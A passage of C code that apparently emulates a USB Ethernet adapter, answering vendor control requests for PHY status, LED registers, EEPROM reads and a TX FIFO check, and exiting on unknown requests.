                case 0x11/*GMII_PHY_PHYSR*/: {
                  printf("    MII_PHY_PHYSR\n");
                  unsigned short physr = 0x0400/*GMII_PHY_PHYSR_LINK*/ |
                                         0x8000/*GMII_PHY_PHYSR_GIGA*/;
                  usb_reply(&physr, sizeof(physr), req_length);
                } break;
                case 0x1a/*GMII_LED_ACT*/: {
                  printf("    GMII_LED_ACT\n");
                  if (is_dir_in) {
                    unsigned short ledact = 0;
                    usb_reply(&ledact, sizeof(ledact), req_length);
                  } else {
                    usb_ack(req_length);
                  }
                } break;
                case 0x1c/*GMII_LED_LINK*/: {
                  printf("    GMII_LED_LINK\n");
                  if (is_dir_in) {
                    unsigned short ledlink = 0;
                    usb_reply(&ledlink, sizeof(ledlink), req_length);
                  } else {
                    usb_ack(req_length);
                  }
                } break;
                case 0x1e/*GMII_PHYPAGE*/: {
                  printf("    GMII_PHYPAGE\n");
                  usb_ack(req_length);
                } break;
                case 0x1f/*GMII_PHY_PAGE_SELECT*/: {
                  printf("    GMII_PHY_PAGE_SELECT\n");
                  usb_ack(req_length);
                } break;
                default:
                  errx(1, "    unknown AX_ACCESS_PHY command 0x%02hhx", control_ev.ctrl.wIndex);
              }
            } break;
            case 0x04/*AX_ACCESS_PHY*/: {
              unsigned eeprom_idx = (unsigned)control_ev.ctrl.wValue;
              printf("  AX_ACCESS_EEPROM at 0x%x\n", eeprom_idx);
              if (is_dir_in) {
                printf("    EEPROM read\n");
                switch (eeprom_idx) {
                  case 0x43: {/* autodetach */
                    unsigned short autodetach = 0xffff;
                    usb_reply(&autodetach, sizeof(autodetach), req_length);
                  } break;
                  default:
                    errx(1, "unhandled EEPROM offset");
                }
              } else {
                printf("    ignoring EEPROM write\n");
                usb_ack(req_length);
              }
            } break;
            case 0x81: {
              printf("  0x81 TX FIFO check\n");
              unsigned int tx_fifo_state = 0;
              usb_reply(&tx_fifo_state, sizeof(tx_fifo_state), req_length);
            } break;
            default:
              errx(1, "unknown vendor ctrlrequest 0x%02hhx", control_ev.ctrl.bRequest);
          }
          break;
        default:
          errx(1, "USB_TYPE_* unknown");
      }
    } else {
      errx(1, "unknown event, type 0x%x\n", (unsigned)control_ev.inner.type);
    }
  }
}
